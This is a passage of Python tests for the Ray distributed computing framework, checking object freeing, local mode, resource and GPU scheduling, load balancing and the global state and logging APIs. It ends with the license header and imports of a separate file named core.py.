assert ray.get(a) != ray.get(c)
assert ray.get(c) != ray.get(b)
ray.internal.free([a, b, c], local_only=local_only)
flush(actors)
return (a, b, c)
actors = [
ActorOnNode0.remote(),
ActorOnNode1.remote(),
ActorOnNode2.remote()
]
# Case 1: run this local_only=False. All 3 objects will be deleted.
(a, b, c) = run_one_test(actors, False)
(l1, l2) = ray.wait([a, b, c], timeout=0.01, num_returns=1)
# All the objects are deleted.
assert len(l1) == 0
assert len(l2) == 3
# Case 2: run this local_only=True. Only 1 object will be deleted.
(a, b, c) = run_one_test(actors, True)
(l1, l2) = ray.wait([a, b, c], timeout=0.01, num_returns=3)
# One object is deleted and 2 objects are not.
assert len(l1) == 2
assert len(l2) == 1
# The deleted object will have the same store with the driver.
local_return = ray.worker.global_worker.plasma_client.store_socket_name
for object_id in l1:
assert ray.get(object_id) != local_return
def test_local_mode(shutdown_only):
@ray.remote
def local_mode_f():
return np.array([0, 0])
@ray.remote
def local_mode_g(x):
x[0] = 1
return x
ray.init(local_mode=True)
@ray.remote
def f():
return np.ones([3, 4, 5])
xref = f.remote()
# Remote functions should return by value.
assert_equal(xref, np.ones([3, 4, 5]))
# Check that ray.get is the identity.
assert_equal(xref, ray.get(xref))
y = np.random.normal(size=[11, 12])
# Check that ray.put is the identity.
assert_equal(y, ray.put(y))
# Make sure objects are immutable, this example is why we need to copy
# arguments before passing them into remote functions in python mode
aref = local_mode_f.remote()
assert_equal(aref, np.array([0, 0]))
bref = local_mode_g.remote(aref)
# Make sure local_mode_g does not mutate aref.
assert_equal(aref, np.array([0, 0]))
assert_equal(bref, np.array([1, 0]))
# wait should return the first num_returns values passed in as the
# first list and the remaining values as the second list
num_returns = 5
object_ids = [ray.put(i) for i in range(20)]
ready, remaining = ray.wait(
object_ids, num_returns=num_returns, timeout=None)
assert_equal(ready, object_ids[:num_returns])
assert_equal(remaining, object_ids[num_returns:])
# Test actors in LOCAL_MODE.
@ray.remote
class LocalModeTestClass(object):
def __init__(self, array):
self.array = array
def set_array(self, array):
self.array = array
def get_array(self):
return self.array
def modify_and_set_array(self, array):
array[0] = -1
self.array = array
test_actor = LocalModeTestClass.remote(np.arange(10))
# Remote actor functions should return by value
assert_equal(test_actor.get_array.remote(), np.arange(10))
test_array = np.arange(10)
# Remote actor functions should not mutate arguments
test_actor.modify_and_set_array.remote(test_array)
assert_equal(test_array, np.arange(10))
# Remote actor functions should keep state
test_array[0] = -1
assert_equal(test_array, test_actor.get_array.remote())
# Check that actor handles work in Python mode.
@ray.remote
def use_actor_handle(handle):
array = np.ones(10)
handle.set_array.remote(array)
assert np.alltrue(array == ray.get(handle.get_array.remote()))
ray.get(use_actor_handle.remote(test_actor))
def test_resource_constraints(shutdown_only):
num_workers = 20
ray.init(num_cpus=10, num_gpus=2)
@ray.remote(num_cpus=0)
def get_worker_id():
time.sleep(0.1)
return os.getpid()
# Attempt to wait for all of the workers to start up.
while True:
if len(
set(
ray.get([
get_worker_id.remote() for _ in range(num_workers)
]))) == num_workers:
break
time_buffer = 0.3
# At most 10 copies of this can run at once.
@ray.remote(num_cpus=1)
def f(n):
time.sleep(n)
start_time = time.time()
ray.get([f.remote(0.5) for _ in range(10)])
duration = time.time() - start_time
assert duration < 0.5 + time_buffer
assert duration > 0.5
start_time = time.time()
ray.get([f.remote(0.5) for _ in range(11)])
duration = time.time() - start_time
assert duration < 1 + time_buffer
assert duration > 1
@ray.remote(num_cpus=3)
def f(n):
time.sleep(n)
start_time = time.time()
ray.get([f.remote(0.5) for _ in range(3)])
duration = time.time() - start_time
assert duration < 0.5 + time_buffer
assert duration > 0.5
start_time = time.time()
ray.get([f.remote(0.5) for _ in range(4)])
duration = time.time() - start_time
assert duration < 1 + time_buffer
assert duration > 1
@ray.remote(num_gpus=1)
def f(n):
time.sleep(n)
start_time = time.time()
ray.get([f.remote(0.5) for _ in range(2)])
duration = time.time() - start_time
assert duration < 0.5 + time_buffer
assert duration > 0.5
start_time = time.time()
ray.get([f.remote(0.5) for _ in range(3)])
duration = time.time() - start_time
assert duration < 1 + time_buffer
assert duration > 1
start_time = time.time()
ray.get([f.remote(0.5) for _ in range(4)])
duration = time.time() - start_time
assert duration < 1 + time_buffer
assert duration > 1
def test_multi_resource_constraints(shutdown_only):
num_workers = 20
ray.init(num_cpus=10, num_gpus=10)
@ray.remote(num_cpus=0)
def get_worker_id():
time.sleep(0.1)
return os.getpid()
# Attempt to wait for all of the workers to start up.
while True:
if len(
set(
ray.get([
get_worker_id.remote() for _ in range(num_workers)
]))) == num_workers:
break
@ray.remote(num_cpus=1, num_gpus=9)
def f(n):
time.sleep(n)
@ray.remote(num_cpus=9, num_gpus=1)
def g(n):
time.sleep(n)
time_buffer = 0.3
start_time = time.time()
ray.get([f.remote(0.5), g.remote(0.5)])
duration = time.time() - start_time
assert duration < 0.5 + time_buffer
assert duration > 0.5
start_time = time.time()
ray.get([f.remote(0.5), f.remote(0.5)])
duration = time.time() - start_time
assert duration < 1 + time_buffer
assert duration > 1
start_time = time.time()
ray.get([g.remote(0.5), g.remote(0.5)])
duration = time.time() - start_time
assert duration < 1 + time_buffer
assert duration > 1
start_time = time.time()
ray.get([f.remote(0.5), f.remote(0.5), g.remote(0.5), g.remote(0.5)])
duration = time.time() - start_time
assert duration < 1 + time_buffer
assert duration > 1
def test_gpu_ids(shutdown_only):
num_gpus = 10
ray.init(num_cpus=10, num_gpus=num_gpus)
@ray.remote(num_gpus=0)
def f0():
time.sleep(0.1)
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 0
assert (os.environ["CUDA_VISIBLE_DEVICES"] == ",".join(
[str(i) for i in gpu_ids]))
for gpu_id in gpu_ids:
assert gpu_id in range(num_gpus)
return gpu_ids
@ray.remote(num_gpus=1)
def f1():
time.sleep(0.1)
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 1
assert (os.environ["CUDA_VISIBLE_DEVICES"] == ",".join(
[str(i) for i in gpu_ids]))
for gpu_id in gpu_ids:
assert gpu_id in range(num_gpus)
return gpu_ids
@ray.remote(num_gpus=2)
def f2():
time.sleep(0.1)
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 2
assert (os.environ["CUDA_VISIBLE_DEVICES"] == ",".join(
[str(i) for i in gpu_ids]))
for gpu_id in gpu_ids:
assert gpu_id in range(num_gpus)
return gpu_ids
@ray.remote(num_gpus=3)
def f3():
time.sleep(0.1)
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 3
assert (os.environ["CUDA_VISIBLE_DEVICES"] == ",".join(
[str(i) for i in gpu_ids]))
for gpu_id in gpu_ids:
assert gpu_id in range(num_gpus)
return gpu_ids
@ray.remote(num_gpus=4)
def f4():
time.sleep(0.1)
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 4
assert (os.environ["CUDA_VISIBLE_DEVICES"] == ",".join(
[str(i) for i in gpu_ids]))
for gpu_id in gpu_ids:
assert gpu_id in range(num_gpus)
return gpu_ids
@ray.remote(num_gpus=5)
def f5():
time.sleep(0.1)
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 5
assert (os.environ["CUDA_VISIBLE_DEVICES"] == ",".join(
[str(i) for i in gpu_ids]))
for gpu_id in gpu_ids:
assert gpu_id in range(num_gpus)
return gpu_ids
# Wait for all workers to start up.
@ray.remote
def f():
time.sleep(0.1)
return os.getpid()
start_time = time.time()
while True:
if len(set(ray.get([f.remote() for _ in range(10)]))) == 10:
break
if time.time() > start_time + 10:
raise Exception("Timed out while waiting for workers to start "
"up.")
list_of_ids = ray.get([f0.remote() for _ in range(10)])
assert list_of_ids == 10 * [[]]
list_of_ids = ray.get([f1.remote() for _ in range(10)])
set_of_ids = {tuple(gpu_ids) for gpu_ids in list_of_ids}
assert set_of_ids == {(i, ) for i in range(10)}
list_of_ids = ray.get([f2.remote(), f4.remote(), f4.remote()])
all_ids = [gpu_id for gpu_ids in list_of_ids for gpu_id in gpu_ids]
assert set(all_ids) == set(range(10))
remaining = [f5.remote() for _ in range(20)]
for _ in range(10):
t1 = time.time()
ready, remaining = ray.wait(remaining, num_returns=2)
t2 = time.time()
# There are only 10 GPUs, and each task uses 2 GPUs, so there
# should only be 2 tasks scheduled at a given time, so if we wait
# for 2 tasks to finish, then it should take at least 0.1 seconds
# for each pair of tasks to finish.
assert t2 - t1 > 0.09
list_of_ids = ray.get(ready)
all_ids = [gpu_id for gpu_ids in list_of_ids for gpu_id in gpu_ids]
# Commenting out the below assert because it seems to fail a lot.
# assert set(all_ids) == set(range(10))
# Test that actors have CUDA_VISIBLE_DEVICES set properly.
@ray.remote
class Actor0(object):
def __init__(self):
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 0
assert (os.environ["CUDA_VISIBLE_DEVICES"] == ",".join(
[str(i) for i in gpu_ids]))
# Set self.x to make sure that we got here.
self.x = 1
def test(self):
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 0
assert (os.environ["CUDA_VISIBLE_DEVICES"] == ",".join(
[str(i) for i in gpu_ids]))
return self.x
@ray.remote(num_gpus=1)
class Actor1(object):
def __init__(self):
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 1
assert (os.environ["CUDA_VISIBLE_DEVICES"] == ",".join(
[str(i) for i in gpu_ids]))
# Set self.x to make sure that we got here.
self.x = 1
def test(self):
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 1
assert (os.environ["CUDA_VISIBLE_DEVICES"] == ",".join(
[str(i) for i in gpu_ids]))
return self.x
a0 = Actor0.remote()
ray.get(a0.test.remote())
a1 = Actor1.remote()
ray.get(a1.test.remote())
def test_zero_cpus(shutdown_only):
ray.init(num_cpus=0)
@ray.remote(num_cpus=0)
def f():
return 1
# The task should be able to execute.
ray.get(f.remote())
def test_zero_cpus_actor(ray_start_cluster):
cluster = ray_start_cluster
cluster.add_node(num_cpus=0)
cluster.add_node(num_cpus=2)
ray.init(redis_address=cluster.redis_address)
local_plasma = ray.worker.global_worker.plasma_client.store_socket_name
@ray.remote
class Foo(object):
def method(self):
return ray.worker.global_worker.plasma_client.store_socket_name
# Make sure tasks and actors run on the remote local scheduler.
a = Foo.remote()
assert ray.get(a.method.remote()) != local_plasma
def test_fractional_resources(shutdown_only):
ray.init(num_cpus=6, num_gpus=3, resources={"Custom": 1})
@ray.remote(num_gpus=0.5)
class Foo1(object):
def method(self):
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 1
return gpu_ids[0]
foos = [Foo1.remote() for _ in range(6)]
gpu_ids = ray.get([f.method.remote() for f in foos])
for i in range(3):
assert gpu_ids.count(i) == 2
del foos
@ray.remote
class Foo2(object):
def method(self):
pass
# Create an actor that requires 0.7 of the custom resource.
f1 = Foo2._remote([], {}, resources={"Custom": 0.7})
ray.get(f1.method.remote())
# Make sure that we cannot create an actor that requires 0.7 of the
# custom resource. TODO(rkn): Re-enable this once ray.wait is
# implemented.
f2 = Foo2._remote([], {}, resources={"Custom": 0.7})
ready, _ = ray.wait([f2.method.remote()], timeout=0.5)
assert len(ready) == 0
# Make sure we can start an actor that requries only 0.3 of the custom
# resource.
f3 = Foo2._remote([], {}, resources={"Custom": 0.3})
ray.get(f3.method.remote())
del f1, f3
# Make sure that we get exceptions if we submit tasks that require a
# fractional number of resources greater than 1.
@ray.remote(num_cpus=1.5)
def test():
pass
with pytest.raises(ValueError):
test.remote()
with pytest.raises(ValueError):
Foo2._remote([], {}, resources={"Custom": 1.5})
def test_multiple_local_schedulers(ray_start_cluster):
# This test will define a bunch of tasks that can only be assigned to
# specific local schedulers, and we will check that they are assigned
# to the correct local schedulers.
cluster = ray_start_cluster
cluster.add_node(num_cpus=11, num_gpus=0)
cluster.add_node(num_cpus=5, num_gpus=5)
cluster.add_node(num_cpus=10, num_gpus=1)
ray.init(redis_address=cluster.redis_address)
cluster.wait_for_nodes()
# Define a bunch of remote functions that all return the socket name of
# the plasma store. Since there is a one-to-one correspondence between
# plasma stores and local schedulers (at least right now), this can be
# used to identify which local scheduler the task was assigned to.
# This must be run on the zeroth local scheduler.
@ray.remote(num_cpus=11)
def run_on_0():
return ray.worker.global_worker.plasma_client.store_socket_name
# This must be run on the first local scheduler.
@ray.remote(num_gpus=2)
def run_on_1():
return ray.worker.global_worker.plasma_client.store_socket_name
# This must be run on the second local scheduler.
@ray.remote(num_cpus=6, num_gpus=1)
def run_on_2():
return ray.worker.global_worker.plasma_client.store_socket_name
# This can be run anywhere.
@ray.remote(num_cpus=0, num_gpus=0)
def run_on_0_1_2():
return ray.worker.global_worker.plasma_client.store_socket_name
# This must be run on the first or second local scheduler.
@ray.remote(num_gpus=1)
def run_on_1_2():
return ray.worker.global_worker.plasma_client.store_socket_name
# This must be run on the zeroth or second local scheduler.
@ray.remote(num_cpus=8)
def run_on_0_2():
return ray.worker.global_worker.plasma_client.store_socket_name
def run_lots_of_tasks():
names = []
results = []
for i in range(100):
index = np.random.randint(6)
if index == 0:
names.append("run_on_0")
results.append(run_on_0.remote())
elif index == 1:
names.append("run_on_1")
results.append(run_on_1.remote())
elif index == 2:
names.append("run_on_2")
results.append(run_on_2.remote())
elif index == 3:
names.append("run_on_0_1_2")
results.append(run_on_0_1_2.remote())
elif index == 4:
names.append("run_on_1_2")
results.append(run_on_1_2.remote())
elif index == 5:
names.append("run_on_0_2")
results.append(run_on_0_2.remote())
return names, results
client_table = ray.global_state.client_table()
store_names = []
store_names += [
client["ObjectStoreSocketName"] for client in client_table
if client["Resources"]["GPU"] == 0
]
store_names += [
client["ObjectStoreSocketName"] for client in client_table
if client["Resources"]["GPU"] == 5
]
store_names += [
client["ObjectStoreSocketName"] for client in client_table
if client["Resources"]["GPU"] == 1
]
assert len(store_names) == 3
def validate_names_and_results(names, results):
for name, result in zip(names, ray.get(results)):
if name == "run_on_0":
assert result in [store_names[0]]
elif name == "run_on_1":
assert result in [store_names[1]]
elif name == "run_on_2":
assert result in [store_names[2]]
elif name == "run_on_0_1_2":
assert (result in [
store_names[0], store_names[1], store_names[2]
])
elif name == "run_on_1_2":
assert result in [store_names[1], store_names[2]]
elif name == "run_on_0_2":
assert result in [store_names[0], store_names[2]]
else:
raise Exception("This should be unreachable.")
assert set(ray.get(results)) == set(store_names)
names, results = run_lots_of_tasks()
validate_names_and_results(names, results)
# Make sure the same thing works when this is nested inside of a task.
@ray.remote
def run_nested1():
names, results = run_lots_of_tasks()
return names, results
@ray.remote
def run_nested2():
names, results = ray.get(run_nested1.remote())
return names, results
names, results = ray.get(run_nested2.remote())
validate_names_and_results(names, results)
def test_custom_resources(ray_start_cluster):
cluster = ray_start_cluster
cluster.add_node(num_cpus=3, resources={"CustomResource": 0})
cluster.add_node(num_cpus=3, resources={"CustomResource": 1})
ray.init(redis_address=cluster.redis_address)
@ray.remote
def f():
time.sleep(0.001)
return ray.worker.global_worker.plasma_client.store_socket_name
@ray.remote(resources={"CustomResource": 1})
def g():
time.sleep(0.001)
return ray.worker.global_worker.plasma_client.store_socket_name
@ray.remote(resources={"CustomResource": 1})
def h():
ray.get([f.remote() for _ in range(5)])
return ray.worker.global_worker.plasma_client.store_socket_name
# The f tasks should be scheduled on both local schedulers.
assert len(set(ray.get([f.remote() for _ in range(50)]))) == 2
local_plasma = ray.worker.global_worker.plasma_client.store_socket_name
# The g tasks should be scheduled only on the second local scheduler.
local_scheduler_ids = set(ray.get([g.remote() for _ in range(50)]))
assert len(local_scheduler_ids) == 1
assert list(local_scheduler_ids)[0] != local_plasma
# Make sure that resource bookkeeping works when a task that uses a
# custom resources gets blocked.
ray.get([h.remote() for _ in range(5)])
def test_two_custom_resources(ray_start_cluster):
cluster = ray_start_cluster
cluster.add_node(
num_cpus=3, resources={
"CustomResource1": 1,
"CustomResource2": 2
})
cluster.add_node(
num_cpus=3, resources={
"CustomResource1": 3,
"CustomResource2": 4
})
ray.init(redis_address=cluster.redis_address)
@ray.remote(resources={"CustomResource1": 1})
def f():
time.sleep(0.001)
return ray.worker.global_worker.plasma_client.store_socket_name
@ray.remote(resources={"CustomResource2": 1})
def g():
time.sleep(0.001)
return ray.worker.global_worker.plasma_client.store_socket_name
@ray.remote(resources={"CustomResource1": 1, "CustomResource2": 3})
def h():
time.sleep(0.001)
return ray.worker.global_worker.plasma_client.store_socket_name
@ray.remote(resources={"CustomResource1": 4})
def j():
time.sleep(0.001)
return ray.worker.global_worker.plasma_client.store_socket_name
@ray.remote(resources={"CustomResource3": 1})
def k():
time.sleep(0.001)
return ray.worker.global_worker.plasma_client.store_socket_name
# The f and g tasks should be scheduled on both local schedulers.
assert len(set(ray.get([f.remote() for _ in range(50)]))) == 2
assert len(set(ray.get([g.remote() for _ in range(50)]))) == 2
local_plasma = ray.worker.global_worker.plasma_client.store_socket_name
# The h tasks should be scheduled only on the second local scheduler.
local_scheduler_ids = set(ray.get([h.remote() for _ in range(50)]))
assert len(local_scheduler_ids) == 1
assert list(local_scheduler_ids)[0] != local_plasma
# Make sure that tasks with unsatisfied custom resource requirements do
# not get scheduled.
ready_ids, remaining_ids = ray.wait([j.remote(), k.remote()], timeout=0.5)
assert ready_ids == []
def test_many_custom_resources(shutdown_only):
num_custom_resources = 10000
total_resources = {
str(i): np.random.randint(1, 7)
for i in range(num_custom_resources)
}
ray.init(num_cpus=5, resources=total_resources)
def f():
return 1
remote_functions = []
for _ in range(20):
num_resources = np.random.randint(0, num_custom_resources + 1)
permuted_resources = np.random.permutation(
num_custom_resources)[:num_resources]
random_resources = {
str(i): total_resources[str(i)]
for i in permuted_resources
}
remote_function = ray.remote(resources=random_resources)(f)
remote_functions.append(remote_function)
remote_functions.append(ray.remote(f))
remote_functions.append(ray.remote(resources=total_resources)(f))
results = []
for remote_function in remote_functions:
results.append(remote_function.remote())
results.append(remote_function.remote())
results.append(remote_function.remote())
ray.get(results)
@pytest.fixture
def save_gpu_ids_shutdown_only():
# Record the curent value of this environment variable so that we can
# reset it after the test.
original_gpu_ids = os.environ.get("CUDA_VISIBLE_DEVICES", None)
yield None
# The code after the yield will run as teardown code.
ray.shutdown()
# Reset the environment variable.
if original_gpu_ids is not None:
os.environ["CUDA_VISIBLE_DEVICES"] = original_gpu_ids
else:
del os.environ["CUDA_VISIBLE_DEVICES"]
def test_specific_gpus(save_gpu_ids_shutdown_only):
allowed_gpu_ids = [4, 5, 6]
os.environ["CUDA_VISIBLE_DEVICES"] = ",".join(
[str(i) for i in allowed_gpu_ids])
ray.init(num_gpus=3)
@ray.remote(num_gpus=1)
def f():
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 1
assert gpu_ids[0] in allowed_gpu_ids
@ray.remote(num_gpus=2)
def g():
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 2
assert gpu_ids[0] in allowed_gpu_ids
assert gpu_ids[1] in allowed_gpu_ids
ray.get([f.remote() for _ in range(100)])
ray.get([g.remote() for _ in range(100)])
def test_blocking_tasks(shutdown_only):
ray.init(num_cpus=1)
@ray.remote
def f(i, j):
return (i, j)
@ray.remote
def g(i):
# Each instance of g submits and blocks on the result of another
# remote task.
object_ids = [f.remote(i, j) for j in range(2)]
return ray.get(object_ids)
@ray.remote
def h(i):
# Each instance of g submits and blocks on the result of another
# remote task using ray.wait.
object_ids = [f.remote(i, j) for j in range(2)]
return ray.wait(object_ids, num_returns=len(object_ids))
ray.get([h.remote(i) for i in range(4)])
@ray.remote
def _sleep(i):
time.sleep(0.01)
return (i)
@ray.remote
def sleep():
# Each instance of sleep submits and blocks on the result of
# another remote task, which takes some time to execute.
ray.get([_sleep.remote(i) for i in range(10)])
ray.get(sleep.remote())
def test_max_call_tasks(shutdown_only):
ray.init(num_cpus=1)
@ray.remote(max_calls=1)
def f():
return os.getpid()
pid = ray.get(f.remote())
ray.test.test_utils.wait_for_pid_to_exit(pid)
@ray.remote(max_calls=2)
def f():
return os.getpid()
pid1 = ray.get(f.remote())
pid2 = ray.get(f.remote())
assert pid1 == pid2
ray.test.test_utils.wait_for_pid_to_exit(pid1)
def attempt_to_load_balance(remote_function,
args,
total_tasks,
num_nodes,
minimum_count,
num_attempts=100):
attempts = 0
while attempts < num_attempts:
locations = ray.get(
[remote_function.remote(*args) for _ in range(total_tasks)])
names = set(locations)
counts = [locations.count(name) for name in names]
logger.info("Counts are {}.".format(counts))
if (len(names) == num_nodes
and all(count >= minimum_count for count in counts)):
break
attempts += 1
assert attempts < num_attempts
def test_load_balancing(ray_start_cluster):
# This test ensures that tasks are being assigned to all local
# schedulers in a roughly equal manner.
cluster = ray_start_cluster
num_nodes = 3
num_cpus = 7
for _ in range(num_nodes):
cluster.add_node(num_cpus=num_cpus)
ray.init(redis_address=cluster.redis_address)
@ray.remote
def f():
time.sleep(0.01)
return ray.worker.global_worker.plasma_client.store_socket_name
attempt_to_load_balance(f, [], 100, num_nodes, 10)
attempt_to_load_balance(f, [], 1000, num_nodes, 100)
def test_load_balancing_with_dependencies(ray_start_cluster):
# This test ensures that tasks are being assigned to all local
# schedulers in a roughly equal manner even when the tasks have
# dependencies.
cluster = ray_start_cluster
num_nodes = 3
for _ in range(num_nodes):
cluster.add_node(num_cpus=1)
ray.init(redis_address=cluster.redis_address)
@ray.remote
def f(x):
time.sleep(0.010)
return ray.worker.global_worker.plasma_client.store_socket_name
# This object will be local to one of the local schedulers. Make sure
# this doesn't prevent tasks from being scheduled on other local
# schedulers.
x = ray.put(np.zeros(1000000))
attempt_to_load_balance(f, [x], 100, num_nodes, 25)
def wait_for_num_tasks(num_tasks, timeout=10):
start_time = time.time()
while time.time() - start_time < timeout:
if len(ray.global_state.task_table()) >= num_tasks:
return
time.sleep(0.1)
raise Exception("Timed out while waiting for global state.")
def wait_for_num_objects(num_objects, timeout=10):
start_time = time.time()
while time.time() - start_time < timeout:
if len(ray.global_state.object_table()) >= num_objects:
return
time.sleep(0.1)
raise Exception("Timed out while waiting for global state.")
@pytest.mark.skipif(
os.environ.get("RAY_USE_NEW_GCS") == "on",
reason="New GCS API doesn't have a Python API yet.")
def test_global_state_api(shutdown_only):
with pytest.raises(Exception):
ray.global_state.object_table()
with pytest.raises(Exception):
ray.global_state.task_table()
with pytest.raises(Exception):
ray.global_state.client_table()
with pytest.raises(Exception):
ray.global_state.function_table()
with pytest.raises(Exception):
ray.global_state.log_files()
ray.init(num_cpus=5, num_gpus=3, resources={"CustomResource": 1})
resources = {"CPU": 5, "GPU": 3, "CustomResource": 1}
assert ray.global_state.cluster_resources() == resources
assert ray.global_state.object_table() == {}
driver_id = ray.experimental.state.binary_to_hex(
ray.worker.global_worker.worker_id)
driver_task_id = ray.experimental.state.binary_to_hex(
ray.worker.global_worker.current_task_id.id())
# One task is put in the task table which corresponds to this driver.
wait_for_num_tasks(1)
task_table = ray.global_state.task_table()
assert len(task_table) == 1
assert driver_task_id == list(task_table.keys())[0]
task_spec = task_table[driver_task_id]["TaskSpec"]
assert task_spec["TaskID"] == driver_task_id
assert task_spec["ActorID"] == ray_constants.ID_SIZE * "ff"
assert task_spec["Args"] == []
assert task_spec["DriverID"] == driver_id
assert task_spec["FunctionID"] == ray_constants.ID_SIZE * "ff"
assert task_spec["ReturnObjectIDs"] == []
client_table = ray.global_state.client_table()
node_ip_address = ray.worker.global_worker.node_ip_address
assert len(client_table) == 1
assert client_table[0]["NodeManagerAddress"] == node_ip_address
@ray.remote
def f(*xs):
return 1
x_id = ray.put(1)
result_id = f.remote(1, "hi", x_id)
# Wait for one additional task to complete.
wait_for_num_tasks(1 + 1)
task_table = ray.global_state.task_table()
assert len(task_table) == 1 + 1
task_id_set = set(task_table.keys())
task_id_set.remove(driver_task_id)
task_id = list(task_id_set)[0]
function_table = ray.global_state.function_table()
task_spec = task_table[task_id]["TaskSpec"]
assert task_spec["ActorID"] == ray_constants.ID_SIZE * "ff"
assert task_spec["Args"] == [1, "hi", x_id]
assert task_spec["DriverID"] == driver_id
assert task_spec["ReturnObjectIDs"] == [result_id]
function_table_entry = function_table[task_spec["FunctionID"]]
assert function_table_entry["Name"] == "runtest.f"
assert function_table_entry["DriverID"] == driver_id
assert function_table_entry["Module"] == "runtest"
assert task_table[task_id] == ray.global_state.task_table(task_id)
# Wait for two objects, one for the x_id and one for result_id.
wait_for_num_objects(2)
def wait_for_object_table():
timeout = 10
start_time = time.time()
while time.time() - start_time < timeout:
object_table = ray.global_state.object_table()
tables_ready = (object_table[x_id]["ManagerIDs"] is not None and
object_table[result_id]["ManagerIDs"] is not None)
if tables_ready:
return
time.sleep(0.1)
raise Exception("Timed out while waiting for object table to "
"update.")
object_table = ray.global_state.object_table()
assert len(object_table) == 2
assert object_table[x_id]["IsEviction"][0] is False
assert object_table[result_id]["IsEviction"][0] is False
assert object_table[x_id] == ray.global_state.object_table(x_id)
object_table_entry = ray.global_state.object_table(result_id)
assert object_table[result_id] == object_table_entry
@pytest.mark.skipif(
os.environ.get("RAY_USE_NEW_GCS") == "on",
reason="New GCS API doesn't have a Python API yet.")
def test_log_file_api(shutdown_only):
ray.init(num_cpus=1, redirect_worker_output=True)
message = "unique message"
@ray.remote
def f():
logger.info(message)
# The call to sys.stdout.flush() seems to be necessary when using
# the system Python 2.7 on Ubuntu.
sys.stdout.flush()
ray.get(f.remote())
# Make sure that the message appears in the log files.
start_time = time.time()
found_message = False
while time.time() - start_time < 10:
log_files = ray.global_state.log_files()
for ip, innerdict in log_files.items():
for filename, contents in innerdict.items():
contents_str = "".join(contents)
if message in contents_str:
found_message = True
if found_message:
break
time.sleep(0.1)
assert found_message is True
@pytest.mark.skipif(
os.environ.get("RAY_USE_NEW_GCS") == "on",
reason="New GCS API doesn't have a Python API yet.")
def test_workers(shutdown_only):
num_workers = 3
ray.init(redirect_worker_output=True, num_cpus=num_workers)
@ray.remote
def f():
return id(ray.worker.global_worker), os.getpid()
# Wait until all of the workers have started.
worker_ids = set()
while len(worker_ids) != num_workers:
worker_ids = set(ray.get([f.remote() for _ in range(10)]))
worker_info = ray.global_state.workers()
assert len(worker_info) >= num_workers
for worker_id, info in worker_info.items():
assert "node_ip_address" in info
assert "plasma_store_socket" in info
assert "stderr_file" in info
assert "stdout_file" in info
def test_specific_driver_id():
dummy_driver_id = ray.ObjectID(b"00112233445566778899")
ray.init(driver_id=dummy_driver_id)
@ray.remote
def f():
return ray.worker.global_worker.task_driver_id.id()
assert_equal(dummy_driver_id.id(), ray.worker.global_worker.worker_id)
task_driver_id = ray.get(f.remote())
assert_equal(dummy_driver_id.id(), task_driver_id)
ray.shutdown()
@pytest.fixture
def shutdown_only_with_initialization_check():
yield None
# The code after the yield will run as teardown code.
ray.shutdown()
assert not ray.is_initialized()
def test_initialized(shutdown_only_with_initialization_check):
assert not ray.is_initialized()
ray.init(num_cpus=0)
assert ray.is_initialized()
def test_initialized_local_mode(shutdown_only_with_initialization_check):
assert not ray.is_initialized()
ray.init(num_cpus=0, local_mode=True)
assert ray.is_initialized()
def test_wait_reconstruction(shutdown_only):
ray.init(num_cpus=1, object_store_memory=10**8)
@ray.remote
def f():
return np.zeros(6 * 10**7, dtype=np.uint8)
x_id = f.remote()
ray.wait([x_id])
ray.wait([f.remote()])
assert not ray.worker.global_worker.plasma_client.contains(
ray.pyarrow.plasma.ObjectID(x_id.id()))
ready_ids, _ = ray.wait([x_id])
assert len(ready_ids) == 1
def test_ray_setproctitle(shutdown_only):
ray.init(num_cpus=2)
@ray.remote
class UniqueName(object):
def __init__(self):
assert setproctitle.getproctitle() == "ray_UniqueName:__init__()"
def f(self):
assert setproctitle.getproctitle() == "ray_UniqueName:f()"
@ray.remote
def unique_1():
assert setproctitle.getproctitle() == "ray_worker:runtest.unique_1()"
actor = UniqueName.remote()
ray.get(actor.f.remote())
ray.get(unique_1.remote())
def test_duplicate_error_messages(shutdown_only):
ray.init(num_cpus=0)
driver_id = ray.ray_constants.NIL_JOB_ID.id()
error_data = ray.gcs_utils.construct_error_message(driver_id, "test",
"message", 0)
# Push the same message to the GCS twice (they are the same because we
# do not include a timestamp).
r = ray.worker.global_worker.redis_client
r.execute_command("RAY.TABLE_APPEND", ray.gcs_utils.TablePrefix.ERROR_INFO,
ray.gcs_utils.TablePubsub.ERROR_INFO, driver_id,
error_data)
# Before https://github.com/ray-project/ray/pull/3316 this would
# give an error
r.execute_command("RAY.TABLE_APPEND", ray.gcs_utils.TablePrefix.ERROR_INFO,
ray.gcs_utils.TablePubsub.ERROR_INFO, driver_id,
error_data)
@pytest.mark.skipif(
os.getenv("TRAVIS") is None,
reason="This test should only be run on Travis.")
def test_ray_stack(shutdown_only):
ray.init(num_cpus=2)
def unique_name_1():
time.sleep(1000)
@ray.remote
def unique_name_2():
time.sleep(1000)
@ray.remote
def unique_name_3():
unique_name_1()
unique_name_2.remote()
unique_name_3.remote()
success = False
start_time = time.time()
while time.time() - start_time < 30:
# Attempt to parse the "ray stack" call.
output = ray.utils.decode(subprocess.check_output(["ray", "stack"]))
if ("unique_name_1" in output and "unique_name_2" in output
and "unique_name_3" in output):
success = True
break
if not success:
raise Exception("Failed to find necessary information with "
"'ray stack'")
|
core.py
|
# -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import io
import json
import multiprocessing
import os
import pickle # type: ignore
import re
import signal
import subprocess
import tempfile
import unittest
